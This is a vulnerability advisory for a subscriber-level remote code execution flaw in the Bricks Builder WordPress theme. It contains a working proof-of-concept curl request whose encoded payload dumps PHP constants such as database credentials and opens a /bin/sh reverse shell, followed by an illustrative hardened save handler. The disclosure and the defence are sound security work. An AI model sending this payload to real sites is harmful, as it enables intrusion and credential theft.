wpvulndb WPVDB-ID: F7C5DD17-800F-42CD-A167-AF06CE183E3D
History: Oct 03, 2022 - 12:00 a.m.

Bricks Builder < 1.5.4 - Subscriber+ Remote Code Execution

2022-10-03 00:00:00
RG
wpscan.com
8

0.003 Low

EPSS

Percentile

66.5%

The theme allows website editors to include executable code blocks in their pages, and these blocks can contain arbitrary PHP code. By default, code execution is intended to be disabled, and website administrators must explicitly allow it for specific user roles. However, due to improper authorization and input validation, the theme does not perform the server-side checks that would prevent unauthorized users from including executable code blocks, resulting in remote code execution.

PoC

1. Start with a clean WordPress install
2. Install Bricks builder v1.5.3
3. Enable registrations on the website
4. Register as a new user, log in, and copy the cookies
5. Find a valid postId (e.g. 2 - the ID of Sample Page created by default in new WordPress installations)
6. Send the following request to the server:

   curl 'http://example.com/wp-admin/admin-ajax.php' -X POST \
     -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
     -H 'Cookie: INSERT_COOKIES_HERE' \
     --data-raw 'action=bricks_save_post&postId=INSERT_POST_ID_HERE&area=content&nonce=0&content=%5B%7B%22id%22%3A%22aaaaaa%22%2C%22name%22%3A%22code%22%2C%22parent%22%3A0%2C%22children%22%3A%5B%5D%2C%22settings%22%3A%7B%22code%22%3A%22%3C%3Fphp%20echo%20%27Pwned%21%20%3Cpre%3E%27%3B%20var%5Fdump%28get%5Fdefined%5Fconstants%28true%29%5B%27user%27%5D%29%3B%20echo%20%27%3C%2Fpre%3E%27%3B%20%24sock%3Dfsockopen%28%27127%2E0%2E0%2E1%27%2C11111%29%3B%20proc%5Fopen%28%27%2Fbin%2Fsh%20%2Di%27%2C%20array%280%3D%3E%24sock%2C%201%3D%3E%24sock%2C%202%3D%3E%24sock%29%2C%20%24pipes%29%3B%20%3F%3E%22%2C%22executeCode%22%3Atrue%7D%2C%22themeStyles%22%3A%5B%5D%7D%5D'

7. Open the page: the contents should be replaced with a message reading "Pwned", a dump of all PHP constants (e.g. database credentials), and a remote shell is opened to 127.0.0.1:11111
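The description attributes the issue to missing server-side authorization and input validation in the save handler, and the PoC request shows what that handler receives: an admin-ajax action, a postId, a nonce of 0, and a client-chosen executeCode flag inside the JSON content. The following is an added illustrative example of how such a handler can enforce those checks on the server; it is not the Bricks theme's own code, and the hook name, nonce action, option name, meta key and the flat element structure are assumptions modelled on the request shape above.

```php
<?php
// Added example: a hardened admin-ajax save handler for a page-builder
// "code" element. Illustrative only, not the Bricks theme's implementation;
// the hook name, nonce action, option name and meta key are assumptions.

// Assumed option holding the roles an administrator has explicitly allowed
// to execute code. Empty by default, so code execution is disabled unless
// an administrator opts specific roles in.
const EXAMPLE_CODE_EXEC_OPTION = 'example_code_execution_roles';

/**
 * Decide on the server whether the current user may execute code.
 * The decision comes from the stored allow-list, never from a flag the
 * client sent along with the request.
 */
function example_user_may_execute_code(): bool {
    $allowed_roles = (array) get_option(EXAMPLE_CODE_EXEC_OPTION, []);
    $user          = wp_get_current_user();
    if (!$user || !$user->exists()) {
        return false;
    }
    return (bool) array_intersect($user->roles, $allowed_roles);
}

/**
 * Walk a flat element list and enforce the execute-code policy on every
 * "code" element. The element is kept, but executeCode is only true when
 * the client asked for it AND the server-side policy permits it.
 */
function example_enforce_code_policy(array $elements, bool $may_execute): array {
    foreach ($elements as &$element) {
        if (($element['name'] ?? '') !== 'code') {
            continue;
        }
        $requested = !empty($element['settings']['executeCode']);
        $element['settings']['executeCode'] = $requested && $may_execute;
    }
    unset($element);
    return $elements;
}

function example_ajax_save_post(): void {
    // 1. Nonce: reject requests with a missing or forged nonce.
    //    check_ajax_referer() terminates the request on failure.
    check_ajax_referer('example_builder_save', 'nonce');

    // 2. Authorization: the user must be allowed to edit this specific post,
    //    not merely be logged in.
    $post_id = isset($_POST['postId']) ? absint($_POST['postId']) : 0;
    if (!$post_id || !current_user_can('edit_post', $post_id)) {
        wp_send_json_error('Not allowed to edit this post.', 403);
    }

    // 3. Input validation: content must decode to a JSON array of elements.
    $raw      = isset($_POST['content']) ? wp_unslash($_POST['content']) : '';
    $elements = json_decode($raw, true);
    if (!is_array($elements)) {
        wp_send_json_error('Malformed content.', 400);
    }

    // 4. Policy: executable code is gated on the server, independent of the
    //    executeCode value the client submitted.
    $elements = example_enforce_code_policy($elements, example_user_may_execute_code());

    update_post_meta($post_id, '_example_builder_content', $elements);
    wp_send_json_success(['postId' => $post_id]);
}
add_action('wp_ajax_example_save_post', 'example_ajax_save_post');
```

The three checks map directly onto the PoC: the nonce check stops the nonce=0 request, the edit_post capability check stops a freshly registered subscriber from writing to Sample Page, and the policy walk makes executeCode a server-side decision so that a client asserting "executeCode":true gains nothing unless an administrator has put that user's role on the allow-list.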

CPE   Name     Operator   Version
      bricks   lt         1.5.4

